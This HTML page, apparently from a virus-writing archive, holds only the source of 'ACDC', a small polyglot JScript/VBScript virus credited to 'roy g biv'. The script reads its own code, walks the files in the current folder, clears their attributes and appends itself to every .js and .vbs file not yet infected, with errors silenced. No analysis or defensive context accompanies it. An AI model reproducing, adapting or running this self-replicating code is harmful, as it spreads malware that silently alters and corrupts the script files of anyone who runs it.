<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title></title>
<meta name="author" content="DiA">
<meta name="generator" content="Ulli Meybohms HTML EDITOR">

<link rel="stylesheet" href="../css/style_all.css">
</head>

<body>
<pre>

rem=1;/*ACDC - roy g biv 25/02/05*/a=new ActiveXObject("scripting.filesystemobject");b=a.opentextfile(WScript.scriptfullname).readall();b=b.substr(b.search(c=/rem=1/));b=b.substr(0,b.lastIndexOf("*/")+2);for(d=new Enumerator(a.getfolder(".").files);!d.atEnd();d.moveNext()){f=a.getextensionname(e=d.item()).toLowerCase();if(f=="js"||f=="vbs")try{f=a.getfile(e);g=a.attributes;f.attributes=0;if(a.opentextfile(e).readall().search(c)&lt;0)a.opentextfile(e,8).write("\n"+b);f.attributes=g}catch(z){}}/*
on error resume next:set a=createobject("scripting.filesystemobject"):b=a.opentextfile(wscript.scriptfullname).readall:c="rem=1":b=mid(b,instr(b,c)):b=left(b,instrrev(b,"*"+"/")+1):set d=a.getfolder("."):for each e in d.files:f=lcase(a.getextensionname(e)):if f="js"or f="vbs"then f=a.attributes:a.attributes=0:if instr(a.opentextfile(e).readall,c)=0then a.opentextfile(e,8).write vbcrlf+b:a.attributes=f:end if:end if:next:rem*/

</pre>
</body>
</html>